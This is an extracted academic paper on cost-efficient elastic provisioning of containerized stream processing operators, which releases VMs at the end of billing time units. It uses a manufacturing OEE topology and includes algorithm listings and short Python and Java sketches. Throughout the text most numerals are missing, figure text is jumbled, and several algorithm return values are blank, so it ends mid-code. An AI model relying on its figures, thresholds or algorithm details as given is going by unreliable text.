(btus). a btu defines the minimum leasing duration for computational resources, e.g., vms, and often amounts to one hour, like on amazon ec2 (https://aws.amazon.com/ec2/pricing/). the concept of the btu means that the user has to pay for each started hour, regardless of how many minutes the vm is used. because of the btu, the repeated leasing and releasing of vms may result in even higher cost than an over-provisioning scenario (genaud & gossa, ), because releasing a vm before the end of the btu results in a waste of resources. to address this shortcoming, this paper considers an additional resource abstraction layer on top of the vms, to allow for more fine-grained elastic provisioning strategies with the goal to ensure the most cost-efficient usage of the leased resources while respecting given slas. this additional layer is realized by applying the recent trend toward containerized software components, i.e., containerized stream processing operators. the containerization provides several advantages regarding deployment and management of computational resources. besides the smaller granularity compared to vms, containerized stream processing operators also allow for a faster adaptation of the stream processing topology on already running computational resources.
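the effect of the btu can be illustrated with a few lines of arithmetic; this sketch is illustrative only and assumes a one-hour btu and a unit price of 1 per btu.

```python
import math

def leasing_cost(usage_minutes: float, btu_minutes: float = 60.0,
                 price_per_btu: float = 1.0) -> float:
    """cost of a vm under btu-based billing: every started btu is paid in full."""
    return math.ceil(usage_minutes / btu_minutes) * price_per_btu

# assumed example: a vm that is leased and released three times for 20 minutes
# each pays for three full btus, although a single btu would have covered the work.
print(3 * leasing_cost(20))   # 3.0
print(leasing_cost(60))       # 1.0
```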
an additional layer of containers also enables reusing already paid computational resources, i.e., resources can be utilized for the full btu. today, frameworks like apache mesos (hindman et al., ), apache yarn (vavilapalli et al., ), kubernetes (https://kubernetes.io) or docker swarm (https://docs.docker.com/swarm/) provide the functionality to deploy containerized applications on computational resources. these frameworks rely on simple principles like random deployment, bin-packing, or equal distribution to deploy containers across multiple hosts. although these approaches work well for most use cases, the resource usage efficiency for the underlying vms in terms of their btus can be improved, as we are going to show in our work.

in this paper, we propose an elastic resource provisioning approach which ensures an sla-compliant enactment of stream processing topologies while maximizing the resource usage of computational resources and thus minimizing the operational cost, i.e., cost for computational resources and penalty cost for delayed processing, for the topology enactment. the results of our evaluation show that our approach achieves a cost reduction of about % compared to already existing approaches while maintaining the same level of quality of service. the main contributions of our work are the following:
• we propose a btu-based resource provisioning approach, which only performs scaling activities when they are required to cope with the data volumes or when a downscaling operation can achieve a resource cost reduction while maintaining the same sla compliance level.
• we extend the visp runtime (hochreiner et al., b) to support our btu-based resource provisioning approach. the visp runtime is designed to serve as a test environment for resource provisioning mechanisms, and for this work we have not only implemented the btu-based approach but also refined the monitoring infrastructure to collect the information required for our approach.
• we implement a real-world scenario from the manufacturing domain and evaluate the btu-based approach against a threshold-based baseline.

the remainder of this paper is structured as follows: first, we provide a motivational scenario, discuss the system architecture and present the derived requirements in "motivation." based on these requirements we then provide the problem definition for the optimization problem in "problem definition," which leads to our optimization approach presented in "optimization approach." in "evaluation," we describe our evaluation setup and in "results and discussion," we present the evaluation results and their discussion. "related work" provides an overview of the related work, before we conclude the paper in "conclusion."

motivation

motivational scenario
in the following paragraphs, we describe a data stream processing scenario from our eu h project cloud-based rapid elastic manufacturing (crema) (schulte et al., ). figure shows a stream processing topology, which is composed of nine different stream processing operator types (o –o ) that process the data originating from three different sources (s , s , s ). each of the operator types performs a dedicated operation to transform the raw data from manufacturing machines into value-added and human-readable information. the information from the data sources is used to monitor three different aspects, like the availability of the manufacturing machines or the machine temperature, to avoid overheating of the machines and assess their overall equipment effectiveness (oee).

in this scenario, we have two different types of data sources. the first type of data source is sensors, i.e., s and s , which emit machine-readable data and can be directly accessed via an api. the second type of data, e.g., s , is a video feed, which scans a display of the manufacturing machines because some information is not directly accessible via an api. this information needs additional preprocessing to transform the data into machine-readable data.

the availability sensor (s ) emits the current status, i.e., available, defect or planned downtime, of the manufacturing machine every s. this information is then filtered by the filter availability (o ) operator, which generates warnings for each new downtime incident of a specific manufacturing machine. the warning is then forwarded to the inform user (o ) operator, which informs a human supervisor of the machines. the second data source is the production data (s ), which is obtained by a video stream, i.e., an image taken every s. this image contains different production-related information, such as the amount of produced goods, and needs further processing, e.g., by optical character recognition (ocr), to extract machine-readable information. the parse and distribute data (o ) operator distributes the information to the three operators o , o , o that calculate the different components of the oee value. these individual components are then united by the calculate oee (o ) operator and afterwards forwarded to the generate report (o ) operator, which generates a pdf-report every minute. this report aggregates the information of all monitored machines and is forwarded once every minute to the inform user (o ) operator. the temperature sensor (s ) emits the temperature twice every second. this information is processed by the monitor temperature (o ) operator, which triggers a warning whenever the temperature exceeds a predefined threshold. this warning is then also forwarded to the inform user (o ) operator to inform the human supervisor.

due to the different levels of complexity of the operations, each of these operator types has different computational resource requirements, e.g., cpu or memory. some of the operators, e.g., the parse and distribute data operator type, require more resources for processing one data item than others, like the filter availability. besides the computational requirements, each operator type is also assigned with specific service level objectives (slos), like the maximal processing duration of one single data item.

figure: stream processing topology from the manufacturing domain.
this monitoring information is then used by the resource optimization component to evaluate whether operator types need to be replicated to deal with the incoming load. finally, the resource provisioning component is in charge of deploying and un-deploying operators on computational resources. enactment scenario during the enactment, the stream processing operators need to deal with streaming data from a varying amount of manufacturing machines, as shown in fig. at the bottom. this varying data volume requires the spe to adapt its processing capabilities, i.e., the number of operator instances for specific operator types, which are hosted on an arbitrary amount of hosts, e.g., h –h in fig. , on demand to comply with the slas. nevertheless, the spe aims at minimizing the needed number of hosts, since each host amounts for additional cost, by using an optimal deployment. the enactment of our motivational scenario is partitioned into different stages, with a varying number of running manufacturing machines in each stage. at the beginning of stage , each operator is deployed once across the two hosts h –h . since the volume h stage arrival of streaming data over time a m ou nt o f m an uf ac tu ri ng m ac hi ne s o h o o o o o o o o stage h h o h o o o o o o o o o o o stage h h o h o o o o o h stage h h h o o o h o o o o o o o o o o o o o o o o o o o o o figure deployment stages. full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of streaming data increases after some time, the spe needs to adapt the processing capabilities by deploying replicas of the operator types o , o and o in stage . these operator instances are hosted on a new host h because the two already existing hosts cannot cope with the additional operator instances. because the amount of data increases again in stage , the spe needs to replicate further operators to comply with the slas. although the second replication of the operator type o is feasible on the currently available resources, the spe is required to lease a new host for the additional operator instances of types o , o , o , and o . at the end of stage , h –h meet the end of their btu. therefore, the spe evaluates whether some of the replicated operators can be removed again without violating the slas. because the amount of data is decreasing after stage , the system can remove (o , o , o , and o ) or migrate (o ) some of the operator instances to other hosts. this leads to the situation that no operator instances are running on host h at the end of its btu and the spe can accordingly release h , while host h needs to be leased for another btu. requirements based on our motivational scenario, we have identified several requirements which need to be addressed by the optimization approach. sla compliance the first requirement is sla compliance in terms of maximum processing duration, for data that is processed by the stream processing topology. this compliance is the overall goal that needs to be met, regardless of the actual incoming data rate. cost efficiency the second requirement is the cost efficiency for the enactment. this requirement asks for a high system usage of leased resources and an efficient usage of cloud resources, especially regarding their btu. optimization efficiency the optimization efficiency requirement can be split into two different aspects. 
the first aspect is the solution of the optimization problem presented in “problem definition.” because this optimization problem is np-hard (see optimization problem), it is required to devise heuristics to achieve a time- and resource-efficient optimization approach. the second aspect is that the optimization needs to minimize the number of reconfigurations, e.g., scaling operations, for the stream processing topology because each reconfiguration activity has a negative performance impact on the data processing capabilities. problem definition system model and notation the system model is used to describe the system state of the individual operator types that form the stream processing topology as well as the used computational resources. the hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ individual operator types are represented by o ¼ f ; . . . ; o#g, where o ∈ o represents a specific operator type. each operator type o is assigned with minimal resource requirements ocpu and omemory which need to be met to instantiate an operator on any host. at runtime, each operator type is represented by at least one, but up to arbitrary many operator instances, which are described by the set i ¼ f ; . . . ; i#g, whereas each itype is assigned to a particular operator type o ∈ o. this set of operator instances i is running on arbitrarily many hosts that are represented by the set h ¼ f ; . . . ; h#g, whereas each host hosts a subset of i. each of these hosts is furthermore assigned with a set of attributes. the attributes hcpu and hmemory represent the overall computational resources of the host, and the attributes hcpu� and hmemory� represent the remaining computational resources at runtime. the attributes hcpu� and hmemory� are decreased for every operator instance i on the specific host h and can be used to determine if it is possible to deploy an additional operator instance on this particular host h. the attribute hcost represents the cost for the host, which needs to be paid for each btu. the attribute hbtu� represents the remaining, already paid, btu time. to represent the different startup times between cached and non-cached operator images, each host furthermore denotes a set of images himg. this set contains all operator images o ∈ o, which are cached on this particular host. each operator type is assigned a specific image, whose identifier is identical to the name of the operator type. besides the fundamental operator type attributes for instantiating operators, there is also a set of attributes, which is used to ensure the sla compliance for data processing. each operator type is assigned with an estimated data processing duration oslo, that represents the time to process one data item and pass it on to the following operator type according to the stream processing topology. the oslo value is recorded in an optimal processing scenario, where no data item needs to be queued for data processing. since the slo oslo only presents the expected processing duration, we also denote the actual processing duration for each operator od and the amount of data items oqueue that are queued for a particular operator type for processing. in addition to the current od, the system model also considers previous processing durations. 
here we consider for each operator type o, the last n processing durations od denoted as od to odn, whereas each of the values gets updated after a new recording of the od, i.e., od obtains the value of od and od obtains the value of od , etc. if the actual processing duration od takes longer than the slo oslo, penalty cost p accrue to compensate for the violated slas each time a violation v ∈ v occurs. furthermore, we denote two operational attributes for each operator type. the attribute o# represents all current instances, i.e., the sum of all instances of the operator type o, and the attribute os represents all already executed scaling operations, both upscaling and downscaling, for a specific operator type. last, we also denote the current incoming amount of data items as dr. optimization problem based on the identified requirements in “requirements,” we can formulate an optimization problem as shown in eq. ( ). the goal of this optimization problem is hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to minimize the cost for the topology enactment while maintaining given slos. this equation is composed of four different terms, which are designed to cover the different requirements. the first term represents the cost for all currently leased hosts by multiplying the number of all currently leased hosts with the cost for a single host. the second and third term are designed to maximize the resource usage on all currently leased hosts regarding the cpu and memory. the last term ensures the sla compliance of the deployment, due to the penalty cost, which accrue for each slo violation. although the solution of this optimization problem provides an optimal solution for a cost-efficient deployment, it is not feasible to rely on the solution of this problem due to its complexity. to define the complex nature of this problem, we are going to provide a reduction to an unbounded knapsack problem (andonov, poirriez & rajopadhye, ), which is known to be np-hard. min h# � hcost þ p h h hcpu � p i i\itype¼o ocpup h h hcpu þ p h h hmemory � p i i\itype¼o hmemoryp h h hmemory þ x v v v � p ( ) definition of knapsack problem the unbounded knapsack problem assumes a knapsack, whose weight capacity is bounded by a maximum capacity of c and a set of artifacts a. each of these artifacts a is assigned with a specific weight aw > as well as a specific value av > and can be placed an arbitrary amount of times in the knapsack. the goal is to find a set a of items, wherep a a aw � c and p a a av is maximized. np-hardness of the optimization problem for our reduction, we assume a specific instance of our optimization problem. for this specific instance, we assume that the number of hosts is fixed and that each of the operators has the same memory requirements omemory. furthermore, we define the value of a specific operator by the amount of data items oqueue that are queued for a specific operator type, i.e., the more items need to be processed, the higher is the value for instantiating a specific operator. 
based on this specific instance of the optimization problem, we can build an instance of the unbounded knapsack problem, where the maximum capacity c is defined by the maximum amount of cpu resources on all available hosts, \sum_{h \in H} h^{cpu}, the weight aw of the artifacts a is defined by the cpu requirements ocpu of one operator, and the value av of the artifact is defined by the number of items waiting in the operator type-specific queue, oqueue. because a specific instance of our optimization problem can be formulated as a knapsack problem, we can conclude that our optimization problem is also np-hard. it follows that there is no known algorithm which can obtain an optimal solution in polynomial time. since this conclusion conflicts with the third requirement given in "requirements," we decided to realize a heuristic-based optimization approach, which can be solved in polynomial time.

optimization approach
the overall goal of our optimization approach is to minimize the cost for computational resources and maximize the usage of already leased vms while maintaining the required qos levels. therefore, we apply an on-demand approach to reduce the deployment and configuration overhead, i.e., instantiating and removing additional operator instances, and minimize the computational resources required for finding an optimal deployment configuration. due to our emphasis on the btus of vms, we call our approach the btu-based approach in the remainder of this paper.

ensure sufficient processing capabilities
to avoid penalty cost, our approach continuously evaluates the sla compliance of the stream processing topology. whenever the individual processing duration od of a particular operator type o exceeds or threatens to exceed the maximum allowed processing duration oslo according to the upscaling algorithm shown in algorithm 1, the upscaling procedure for the specific operator type is triggered. this upscaling procedure consists of several steps, as depicted in fig. . the first task is to evaluate if any of the currently running hosts offers enough computational resources to host the additional instance of the specific operator. therefore, we apply the host selection algorithm, as described in algorithm 2, for every currently running host to obtain a utility value for the host. assuming that there is at least one host with a positive utility value, the host with the best utility value is selected to deploy the new operator instance, and the upscaling procedure is finished. when no host with a positive utility value is available, i.e., no host offers enough computational resources to instantiate a new instance for the required operator type, there are two possibilities to obtain the required computational resources. the first possibility is to scale down existing operators when they are not required anymore. we therefore apply the operator selection algorithm, as described in algorithm 3 and discussed in "algorithms." if there is any operator type that can be scaled down, an operator instance of this operator type will be scaled down to free resources for the upscaling operation. when there are no operator types which can be scaled down, i.e., all operators are needed for sla-compliant data stream processing, the second possibility is applied, where the spe leases a new host.
as soon as the resources are either provided by scaling down another operator type or the new host is running, the spe deploys the required operator instance and finishes the upscaling procedure.

algorithm 1: upscaling algorithm
function uptrigger(o, n)
    if od > oslo then
        upscaling =
    end if
    observationmean = (1/n) · Σ_{i=1..n} i
    durationmean = (1/n) · Σ_{i=1..n} odi
    b = Σ_{i=1..n} (i − observationmean)(odi − durationmean) / Σ_{i=1..n} (i − observationmean)²
    a = durationmean − b · observationmean
    predictedduration = a + b · (n + 1)
    if predictedduration > oslo then
        upscaling =
    end if
    if upscaling = then
        return
    end if
    if oqueue > scalingthreshold then
        return
    end if
    return
end function

optimize resource usage
to minimize the cost of computational resources, the optimization approach aims at using the leased resources as efficiently as possible. this means that the spe uses all paid resources until the end of their btus and evaluates shortly before, i.e., within the last % of the btu, whether a host needs to be leased for another btu, i.e., the resources are still required, or if the host can be released again. to release hosts, as shown in fig. , all operator instances running on the designated host which is targeted to be shut down need to be either released or migrated to other hosts. this releasing procedure consists of three phases. the first phase is a simulation phase, where the optimization approach creates a downscaling plan to evaluate whether the downscaling and migration is actually feasible. hereby, the optimization approach applies the operator selection algorithm for all operator types which have running instances on this host and obtains their utility value. if any of the operator types has a positive utility value, all operator instances (up to % of all operator instances for the specific type) running on this host are marked to be released. the %-threshold for the operator instances is in place to avoid any major reconfigurations for a single operator type, since it may be the case that all operator instances for the operator type are running on this host and after the downscaling there would not be sufficient operator instances left, which would trigger the upscaling procedure again. for those operator instances which cannot be shut down, the procedure simulates whether they can be migrated to other hosts. this simulation uses the upscaling procedure for operator types, as described in "ensure sufficient processing capabilities." the only difference is that the host which is targeted to be shut down is omitted as a suitable host. if the simulation renders no feasible downscaling plan, the host is leased for another btu and the downscaling procedure is finished. in case there is a downscaling plan, the operators are released in phase two and, if any migration is required, the upscaling procedure for operator types is triggered based on the simulation in phase three. when all operator instances are successfully removed (scaled down or migrated), the shutdown of the host is initialized. in the unlikely event that the downscaling plan could not be executed, i.e., the operator instance migrations fail, the host also needs to be leased for another btu.
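the btu-end release decision described above can be sketched in a few lines of python. this is a simplified illustration, not the visp implementation: the host and demand structures, the per-instance resource demand, and the returned decision strings are assumptions made for the example, and the three-phase procedure is reduced to a plan-then-apply loop.

```python
from dataclasses import dataclass, field

@dataclass
class Host:
    name: str
    cpu_free: float
    instances: list = field(default_factory=list)   # operator type per instance

def btu_end_decision(expiring: Host, other_hosts: list, min_instances: dict,
                     instance_count: dict, cpu_per_instance: float = 1.0) -> str:
    """phase 1: simulate whether every instance on the expiring host can either be
    scaled down (more instances running than required) or migrated elsewhere.
    only if the whole plan is feasible are phases 2/3 (release + migrate) applied."""
    free = {h.name: h.cpu_free for h in other_hosts}
    remaining = dict(instance_count)
    plan = []
    for op in expiring.instances:
        if remaining[op] > min_instances[op]:
            plan.append((op, None))                               # can simply be scaled down
            remaining[op] -= 1
            continue
        target = next((h for h in other_hosts if free[h.name] >= cpu_per_instance), None)
        if target is None:
            return "prolong lease for another btu"                # simulation failed
        free[target.name] -= cpu_per_instance
        plan.append((op, target))                                 # must be migrated
    for op, target in plan:                                       # apply the plan
        expiring.instances.remove(op)
        if target is not None:
            target.instances.append(op)
    return "release host"

# assumed example: h3 runs one still-needed replica of o3 and one spare replica of o4.
h1 = Host("h1", cpu_free=1.0, instances=["o1", "o2"])
h3 = Host("h3", cpu_free=0.0, instances=["o3", "o4"])
print(btu_end_decision(h3, [h1], {"o3": 1, "o4": 1}, {"o3": 1, "o4": 2}))  # release host
```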
figure : upscaling procedure for a specific operator type. [flowchart: upscaling for a specific operator type is triggered, the utility of all hosts is assessed, and if enough resources are available the best host is selected and an instance for the specific operator type is added; otherwise a scaledown of other operator types is attempted or, if that is not successful, another host is leased before the instance is added]

algorithm : host selection algorithm
function up(h, o)
    feasibilitythreshold = min(hcpu* / ocpu, hmemory* / omemory)
    if feasibilitythreshold < 1 then
        return -1
    end if
    remainingcpu = hcpu* - ocpu
    remainingmemory = hmemory* - omemory
    difference = | remainingcpu / hcpu - remainingmemory / hmemory |
    suitability = difference / feasibilitythreshold
    if s ∈ himg then
        suitability = suitability * cf
    end if
    return suitability
end function

algorithms
to realize our btu-based provisioning approach, we have devised three algorithms, which are discussed in detail in this section. these three algorithms realize individual tasks for the upscaling and downscaling procedures as shown in figs. and . algorithm ensures the sla compliance of the individual operator types on a regular basis by interpreting the monitoring information of the visp runtime. the other two algorithms are only triggered if a new operator instance needs to be started or when there is a shortage of free computational resources. these two algorithms analyze the sla compliance and resource usage on demand at specific points in time and identify the most suitable host for upscaling (algorithm ) or potential operator types which can be scaled down (algorithm ). although these algorithms do not represent the core functionality of the resource provisioning approach, they are still essential to identify required upscaling operations and to choose the optimal degree of parallelism per operator, whereas the overall cost reduction and reconfiguration is represented by the downscaling procedure shown in fig. . the remainder of this section discusses the structure and rationale of these three algorithms in detail.

algorithm : operator selection algorithm
function down(o)
    if o# < 1 then
        return -1
    end if
    instances = (o# - min(o# over all operator types)) / (max(o# over all operator types) - min(o# over all operator types))
    delay = (od / oslo) * (1 + p)
    scalings = (up- and downscaling operations of o) / (scaling operations of all operator types)
    if oqueue < 1 then
        queueload = ql
    else
        queueload = 0
    end if
    return w1 * instances + w2 * queueload - w3 * delay - w4 * scalings
end function

figure : downscaling procedure for a host. [flowchart: when the btu of a host ends, the spe simulates the downscaling and migration of all operator instances on the host; if a feasible downscaling plan exists, the instances are scaled down or migrated and the host is released, otherwise the host is leased for another btu]
the upscaling algorithm as listed in algorithm is used to evaluate whether any operator needs to be scaled up. this algorithm is executed on a regular basis for each operator type o and either returns , if the current stream processing capabilities are enough to comply with the slas, or if the operator type needs to be scaled up. therefore, this algorithm considers, on the one hand, the current processing duration of the operator (line ) and, on the other hand, the trend of the previous processing durations. for the trend prediction, we apply a simple linear regression for the last n observations, based on the linear least squares estimator (lines – ). if the current duration od or the predicted duration is higher than the slo oslo, we consider the operator type to be scaled up (line ). before we trigger the upscaling operation, we apply an additional check if the upscaling operation is required. the stream processing topology may retrieve short-term data volume peaks, e.g., due to short network disruptions. these peaks would not require any additional computational resources, because they would be dealt with after a short time with the already available processing capabilities. nevertheless, the upscaling algorithm would trigger the upscaling procedure, because it would detect the processing delay. therefore, the algorithm also considers the current load of data items oqueue before scaling up by checking whether the amount of queued items for processing exceeds a scalingthreshold (lines – ). algorithm , i.e., the host selection algorithm, is used to rank all currently leased hosts according to their suitability to host a new operator instance of a particular operator type. therefore, the algorithm evaluates for each host h whether a new instance of the required operator type o could be hosted on that specific host at all. here, the algorithm considers both, the cpu and memory requirements, and derives the maximum amount of instances that can be hosted. if this value is less than , i.e., there are no resources left for a single additional operator instance, the function returns a negative value. the first check evaluates the feasibility of deploying a new operator instance on the host (lines – ). in a second stage, this algorithm evaluates the suitability of this host. here the algorithm simulates the resource usage of the host, assuming the operator instance would be deployed on the host. the overall goal is an equal distribution of cpu and memory usage across all hosts, to avoid situations where hosts maximize their cpu usage, but hardly use any memory and vice versa. therefore, the algorithm calculates the difference between the normalized cpu usage and memory usage, whereas a lower value represents a better ratio between cpu and memory and therefore a better fit (lines – ). besides the equal distribution of memory and cpu on the individual hosts, we also want to distribute hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the operators equally among all currently leased hosts. the assigned cpu ocpu and memory omemory attributes only represent the resources which are guaranteed for the operators. this allows operators to use currently unused resources of the hosts based on a first come first service principle. 
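returning to the upscaling algorithm described above, the following sketch shows the linear least-squares trend prediction combined with the queue-based spike filter; the method names, the example durations and the thresholds are assumptions for illustration and not the actual visp implementation.

public final class UpscalingTriggerSketch {

    static boolean shouldScaleUp(double[] durationsMs, double sloMs, long queuedItems, long scalingThreshold) {
        int n = durationsMs.length;
        double current = durationsMs[n - 1];

        // simple linear regression of the processing duration over the observation index 1..n
        double obsMean = 0, durMean = 0;
        for (int i = 1; i <= n; i++) { obsMean += i; durMean += durationsMs[i - 1]; }
        obsMean /= n; durMean /= n;
        double num = 0, den = 0;
        for (int i = 1; i <= n; i++) {
            num += (i - obsMean) * (durationsMs[i - 1] - durMean);
            den += (i - obsMean) * (i - obsMean);
        }
        double b = den == 0 ? 0 : num / den;
        double a = durMean - b * obsMean;
        double predicted = a + b * (n + 1);

        boolean sloViolated = current > sloMs || predicted > sloMs;
        // ignore short-term spikes that will drain with the existing capacity
        return sloViolated && queuedItems > scalingThreshold;
    }

    public static void main(String[] args) {
        double[] lastDurations = {410, 450, 520, 610, 700};            // hypothetical monitoring values in ms
        System.out.println(shouldScaleUp(lastDurations, 650, 180, 50)); // true: trend exceeds the slo and the queue is loaded
    }
}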
to maximize the usage, we aim for an equal distribution of the unassigned resources, i.e., hcpu� and hmemory�, which can be used by the operators to cover short-term data volume peaks without any reconfigurations required. this aspect is covered by dividing the difference value by the feasibility value to prefer those hosts which are least used (line ). last, we also consider the deployment time aspect for a particular operator type. here, we prefer those hosts, which have already the operator image cached. while such operator images may be rather small for spes which operate on a process or thread level, like apache storm, these images can reach up to mb for containerized operators. this requires some time to download the operator images from an external repository. in order to distinguish hosts, which have a cached copy of the operator image from those hosts that do not have a cached copy of the operator image, we multiply the suitability with a constant factor cf to create two different groups of hosts for the overall selection (lines – ). for this constant factor, we recommend to use the value . which was also used in the remainder of our work. the value . was chosen to clearly distinguish these two groups, since the actual suitability values are always in the range of – based on the structure of the algorithm. each of these group maintains their resource-based ordering, but we prioritize those hosts that provide a faster startup time due to the cached image, i.e., the group with lower values. the result of this algorithm is either a negative value for a host, i.e., the host can run the new operator instance, or a positive value, whereas the lowest value among several hosts shows the best suitability. algorithm , i.e., the operator selection algorithm, is used to select operator types which can be scaled down without violating the slos. therefore, this algorithm considers several static as well as runtime aspects of the operator types. the goal of the algorithm is to obtain a value which describes the suitability of a particular operator type to be scaled down. whenever the value is negative, the operator type must not be scaled down, i.e., all operator instances for this type are required to fulfill the slo. first, the algorithm ensures that there is at least one operator instance for the given operator type (lines – ). second, the function considers the amount of all currently running instances for the specific operator type and normalizes it to obtain a value between and (line ). this normalization is carried out based on the maximal respectively minimal amount of instances for all operator types. this value represents the aspect that it is better to scale down an operator type with numerous operator instances because the scale down operation removes a smaller percentage of processing power compared to an operator type with fewer operator instances. furthermore, we consider the sla compliance of the particular operator. here, we consider the actual compliance for the processing duration and multiply it with the penalty cost as a weighting factor (line ). since the penalty cost for the violation of a single data item is typically lower than , we add to the penalty cost p. whenever the processing duration od takes longer than the slo oslo, the delay value will be less than , hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ but when there is any delay, the delay value can become arbitrarily high. 
the next value for consideration is the relative amount of scaling operations (both up and down) in contrast to the entire scaling operations (line ). here, we penalize previous scaling operations because we want to avoid any oscillating effects, i.e., multiple up- and down-scaling operations for a specific operator. the last factor is the queueload. in the course of our evaluations, we have seen that the algorithm may take a long time to recover after a load peak, i.e., release obsolete operator instances as soon as the data is processed. this can be observed when the spe is confronted with a massive data spike followed by a small data volume for some time. for this scenario, the heuristic discourages any downscaling operation due to the delay factor, which may be high due to the delayed processing of the data spike. to resolve this shortcoming, we introduce the queueload factor ql, which encourages the downscaling of an operator type, as soon as no data items are waiting in the incoming queue oqueue (lines – ). for ql we recommend the use of the value to clearly indicate that the operator type can be scaled down, regardless of the other values which are in the range of – for the instances and scalings value or significantly lower than for the delay value. this value was selected based on a number of preliminary experiments prior to the actual evaluation where the data processing never took longer than times of the intended processing duration. finally, we join the distinct aspects to obtain the overall utility value. while the number of instances and queueload represent a positive aspect to scale down an operator, all other aspects discourage a scaling operation. the instances and scalings value are normalized between and whereas the scalings value can exceed if the data processing is delayed. therefore, we introduce optional weights w , w , w , and w for the different aspects, whereas the default value for each of these weights is to treat all aspects with the same emphasis. the result is the utility value, which describes the suitability of the particular operator to be scaled down, whereas a higher value suggests a better suitability (line ). evaluation evaluation setup for our evaluation, we revisit our motivational scenario (see motivation) and discuss the concrete implementation of this topology. sensor types first, we are going to discuss the sensors which emit the data items for our topology. in this topology, we consider three different sensor types, as listed in table . each of these sensor types generates a data item, with a particular structure, which can be only processed by a dedicated operator type, e.g., o for sensor type s . due to the different structure, the size of the data items also differs. the first and the last sensor type (s and s ) encode the information in plain text. this results in rather small data items with a size of – bytes. the second sensor type encodes the information with an image and is therefore much larger, i.e., around , bytes. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ operator types the second important implementation aspect for the topology are the operators. each of these operator types performs a specific task with specific resource requirements and specific processing durations. table lists all operator types which are used in this evaluation. each operator is assigned a number of different performance as well as resource metrics. 
the resource metrics represent mean values across several topology enactments. the processing duration represents the average time which is required to process one specific data item as well as the time the data item spends within the messaging infrastructure between the previous operator and the one in focus. the cpu metric represents the amount of cpu shares which is required by the operator when executed on a single-core vm. the memory value represents the mean memory usage. this memory value accumulates the actual memory used by the operator instances and the currently used file cache, which results in a rather high value compared to the actual size of the operator image. the cpu metric and the memory metric are determined based on long-term recordings, whereas the stated value in the table is calculated by adding both the absolute maximum and the average value of all observations for a specific operator and dividing this value by . for the processing duration, we have conducted several preliminary evaluations, where the spe processes constant data volumes in a fixed over-provisioning scenario to avoid any waiting durations in the recordings. for the storage of the operator images, we have three different sizes. because the majority of the processing operators only implement processing logic, the size of the images is the same. the only two exceptions are the generate report (o ) image, which also contains a pdf generation library, and the parse and distribute data (o ) operator image, which also contains the tesseract binary, which is required to parse the images.

table : sensor types. [columns: emission rate/min, size (bytes); rows: availability sensor (s ), production data (s ), temperature sensor (s )]

table : stream processing operator types. [columns: processing duration (ms), cpu shares, memory (mb), storage (mb), state, outgoing ratio; rows: parse and distribute data (o ), filter availability (o ), calculate performance (o ), calculate availability (o ), calculate quality (o ), monitor temperature (o ), calculate oee (o ), inform user (o ), generate report (o )]

each of the stateful operators, as indicated in the table, can store and retrieve data from the shared state to synchronize the data among different data items and different instances of one operator type. the outgoing ratio describes whether a particular operator type consumes more data items than it emits, e.g., o combines three data items before it emits a combined one, or whether it emits more data items than it receives, e.g., o distributes the production information to three other operator types. for our scenario, we have implemented nine different operators (https://github.com/visp-streaming/processingnodes) as spring boot (https://projects.spring.io/spring-boot/) applications, which are discussed in detail in the remainder of this section.

parse and distribute data (o )
the parse and distribute data operator type is designed to receive an image with encoded production data and parse this image to extract the information. for our implementation, we use the tesseract ocr engine (https://github.com/tesseract-ocr/tesseract) to parse the image, and the spring boot application then forwards the machine-readable production data to the downstream operator types.

filter availability (o )
each manufacturing machine can have three different availability types: available, planned downtime, and defect.
while the first two types represent intended behavior, the last type signals a defect and should be propagated to a human operator. this operator issues a warning for each new defect notification and filters all other data items.

calculate performance (o )
the calculate performance operator type calculates the performance of the last reporting cycle, i.e., the time between two production data emissions. the actual performance is derived by the formula shown in eq. ( ) (nakajima, ).

performance = (produceditems * idealproductiontime) / reportingcycle ( )

calculate availability (o )
the calculate availability operator type represents the overall availability of the manufacturing machine from the beginning of the production cycle, e.g., the start of the evaluation. the availability is defined by the formula shown in eq. ( ) (nakajima, ).

availability = (totaltime - scheduleddowntime - unscheduleddowntime) / totaltime ( )

calculate quality (o )
the calculate quality operator type represents the share of non-defective goods among all produced goods from the beginning of the production cycle. the quality is defined by the formula shown in eq. ( ) (nakajima, ).

quality = (totalproducedgoods - totaldefectivegoods) / totalproducedgoods ( )

monitor temperature (o )
the monitor temperature operator type filters all temperatures below a predefined threshold and issues a notification to the human operator for each new temperature violation.

calculate oee (o )
the calculate oee operator synchronizes the upstream operations based on the timestamp of the initial data item and calculates the overall oee value according to the formula in eq. ( ).

oee = availability * performance * quality ( )

inform user (o )
the inform user operator type forwards the notifications to a human user. in our evaluation scenario, this operator type only serves as a monitoring endpoint for the sla compliance, and all incoming data items are discarded at this operator type.

generate report (o )
the generate report operator aggregates multiple oee values and generates a pdf report which summarizes a predefined amount of oee values. this report is then forwarded to the user for further manual inspection.

evaluation deployment
for our evaluation, we make use of the visp testbed (hochreiner, ), which is a toolkit of different evaluation utilities that support repeatable evaluation runs. the most notable component of this toolkit is the visp data provider, which allows simulating an arbitrary amount of data sources. furthermore, the data provider also allows defining different arrival patterns (see "data arrival pattern") to evaluate the adaptation possibilities of the visp runtime, in particular of its scaling mechanisms. the evaluation runs are carried out in a private cloud running openstack (https://www.openstack.org), whereas the components are deployed on different vms, as depicted in fig. .
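as a small worked example for the oee-related operators described above, the following sketch combines the performance, availability and quality formulas into the overall oee value; all input numbers are made up for illustration and do not correspond to the evaluation data.

public final class OeeSketch {

    static double performance(double producedItems, double idealProductionTimeMin, double reportingCycleMin) {
        return (producedItems * idealProductionTimeMin) / reportingCycleMin;
    }

    static double availability(double totalTimeMin, double scheduledDowntimeMin, double unscheduledDowntimeMin) {
        return (totalTimeMin - scheduledDowntimeMin - unscheduledDowntimeMin) / totalTimeMin;
    }

    static double quality(double totalProducedGoods, double totalDefectiveGoods) {
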